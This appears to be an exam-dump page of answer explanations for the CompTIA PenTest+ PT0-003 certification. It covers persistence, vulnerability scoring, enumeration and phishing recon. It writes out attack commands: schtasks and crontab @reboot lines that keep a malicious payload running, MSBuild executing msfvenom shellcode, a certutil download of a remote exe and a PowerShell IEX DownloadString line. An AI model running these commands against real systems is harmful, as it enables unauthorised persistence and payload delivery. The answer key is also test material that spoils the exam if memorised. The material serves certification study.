PT0-003 Exam Dumps - CompTIA PenTest+ Questions and Answers

To maintain access to a compromised system after rebooting, a penetration tester should create a scheduled task. Scheduled tasks are designed to run automatically at specified times or when certain conditions are met, ensuring persistence across reboots.

Persistence Mechanisms:

Scheduled Task: Creating a scheduled task ensures that a specific program or script runs automatically according to a set schedule or in response to certain events, including system startup. This makes it a reliable method for maintaining access after a system reboot.

Reverse Shell: While establishing a reverse shell provides immediate access, it typically does not survive a system reboot unless coupled with another persistence mechanism.

Process Injection: Injecting a malicious process into another running process can provide stealthy access but may not persist through reboots.

Credential Dumping: Dumping credentials allows for re-access by using stolen credentials, but it does not ensure automatic access upon reboot.

Creating a Scheduled Task:

On Windows, the schtasks command can be used to create scheduled tasks. For example:

schtasks /create /tn "Persistence" /tr "C:\path\to\malicious.exe" /sc onlogon /ru SYSTEM

On Linux, a cron job can be created by editing the crontab:

(crontab -l; echo "@reboot /path/to/malicious.sh") | crontab -

Pentest References:

Maintaining persistence is a key objective in post-exploitation. Scheduled tasks (Windows Task Scheduler) and cron jobs (Linux) are commonly used techniques.

References to real-world scenarios include creating scheduled tasks to execute malware, keyloggers, or reverse shells automatically on system startup.

By creating a scheduled task, the penetration tester ensures that their access method (e.g., reverse shell, malware) is executed automatically whenever the system reboots, providing reliable persistence.

=================

Based on the CVSS (Common Vulnerability Scoring System) and EPSS (Exploit Prediction Scoring System) scores, Target 1 is the most likely to get attacked.

CVSS:

Definition: CVSS provides a numerical score to represent the severity of a vulnerability, helping to prioritize the response based on the potential impact.

Score Range: Scores range from 0 to 10, with higher scores indicating more severe vulnerabilities.

EPSS:

Definition: EPSS estimates the likelihood that a vulnerability will be exploited in the wild within the next 30 days.

Score Range: EPSS scores range from 0 to 1, with higher scores indicating a higher likelihood of exploitation.

Analysis:

Target 1: CVSS = 4, EPSS = 0.6

Target 2: CVSS = 2, EPSS = 0.3

Target 3: CVSS = 1, EPSS = 0.6

Target 4: CVSS = 4.5, EPSS = 0.4

Target 1 has a moderate CVSS score and a high EPSS score, indicating it has a significant vulnerability that is quite likely to be exploited.

Pentest References:

Vulnerability Prioritization: Using CVSS and EPSS scores to prioritize vulnerabilities based on severity and likelihood of exploitation.

Risk Assessment: Understanding the balance between impact (CVSS) and exploit likelihood (EPSS) to identify the most critical targets for remediation or attack.

By focusing on Target 1, which has a balanced combination of severity and exploitability, the penetration tester can address the most likely target for attacks based on the given scores.

=================

Hidden form fields in web applications can store user roles, session tokens, and security parameters that attackers may exploit.

HTML scraping (Option D):

Involves analyzing HTML source code to find hidden fields like:

Attackers use tools like Burp Suite, ZAP, or browser developer tools (Ctrl+U or Inspect Element) to locate hidden fields.

An API (Application Programming Interface) is a common target in penetration testing, especially in modern web and mobile applications. APIs can be entry points for injection attacks, authentication bypasses, and data leakage.

From the CompTIA PenTest+ PT0-003 Official Study Guide (Chapter 1 – Planning and Scoping):

“Testers should identify all targets, including web applications, APIs, and other exposed services as part of the rules of engagement.”

The missing do keyword is the reason for the syntax error. Bash for loops must include a do statement before executing commands within the loop.

Corrected script:

#!/bin/bash

for i in {1..254}; do

ping -c1 192.168.1.$i

done

From the CompTIA PenTest+ PT0-003 Official Study Guide (Chapter 4 – Scanning and Enumeration):

“In Bash scripting, control structures like for-loops require correct syntax, including the 'do' keyword for loop logic to execute properly.”

The provided msfvenom command creates a payload in C# format. To continue the attack using the generated shellcode in evil.xml, the most appropriate execution method involves MSBuild.exe, which can process XML files containing C# code:

Understanding MSBuild.exe:

Purpose: MSBuild is a build tool that processes project files written in XML and can execute tasks defined in the XML. It’s commonly used to build .NET applications and can also execute code embedded in project files.

Command Usage:

Command: MSBuild.exe C:\evil.xml

This command tells MSBuild to process the evil.xml file, which contains the C# shellcode. MSBuild will compile and execute the code, leading to the payload execution.

Comparison with Other Commands:

regsvr32 /s /n /u C:\evil.xml: Used to register or unregister DLLs, not suitable for executing C# code.

mshta.exe C:\evil.xml: Used to execute HTML applications (HTA files), not suitable for XML containing C# code.

AppInstaller.exe C:\evil.xml: Used to install AppX packages, not relevant for executing C# code embedded in an XML file.

Using MSBuild.exe is the most appropriate method to execute the payload embedded in the XML file created by msfvenom.

=================

La opción C, dig axfr @local.dns.server, realiza una transferencia de zona DNS (Zone Transfer). Si el servidor DNS está mal configurado y permite este tipo de solicitudes, el atacante puede obtener todos los registros DNS del dominio interno.

La opción A muestra solo registros A/AAAA. La B no hace enumeración completa. La D no es válida como sintaxis.

Referencia: PT0-003 Objective 3.3 – Perform domain enumeration using dig and DNS zone transfer techniques.

To execute a payload and gain additional access, the penetration tester should use certutil.exe. Here’s why:

Using certutil.exe:

Purpose: certutil.exe is a built-in Windows utility that can be used to download files from a remote server, making it useful for fetching and executing payloads.

Command: certutil.exe -f https://192.168.0.1/foo.exe bad.exe downloads the file foo.exe from the specified URL and saves it as bad.exe.

Comparison with Other Commands:

powershell.exe impo C:\tools\foo.ps1 (A): Incorrect syntax and not as direct as using certutil for downloading files.

powershell.exe -noni -encode IEX.Downloadstring("http://172.16.0.1/ ") (C): Incorrect syntax for downloading and executing a script.

rundll32.exe c:\path\foo.dll,functName (D): Used for executing DLLs, not suitable for downloading a payload.

Using certutil.exe to download and execute a payload is a common and effective method.

=================

DREAD (Damage, Reproducibility, Exploitability, Affected Users, Discoverability) is a threat modeling framework used to assess and prioritize risks.

Option A (Web application test) ❌: While DREAD can be used in web security, PTES (Penetration Testing Execution Standard) is a better framework for conducting pentests.

Option B (Mobile application test) ❌: PTES provides guidelines for mobile security testing, whereas DREAD is for threat modeling.

Option C (Thick client application) ❌: Thick clients require specific testing methodologies, not DREAD.

Option D (Creating a threat model) ✅: Correct.

DREAD is designed for risk assessment and prioritization.

PTES focuses on penetration testing execution, not threat modeling.

???? Reference: CompTIA PenTest+ PT0-003 Official Guide – Threat Modeling with DREAD vs. PTES

Comprehensive and Detailed Explanation:

After obtaining employee names, the immediate next step for a phishing campaign is often to discover their email addresses. Hunter.io is a service that helps find and verify email addresses for people at a domain (pattern discovery + verification). Using Hunter.io (or similar tools) lets the tester build an accurate recipient list before crafting phishing content or campaigns.

Why not the others as the first step:

A (Wayback Machine): Useful for finding historical content or pages but not directly for harvesting current email addresses.

C (SpiderFoot): Powerful OSINT aggregation tool, could be used but is heavier and often used after initial enumeration.

D (Social Engineering Toolkit): Used to craft/send phishing payloads once targets (email addresses) are gathered — not the first data-gathering tool.

PT0-003 mapping: Domain 2/3 — OSINT and social-engineering reconnaissance.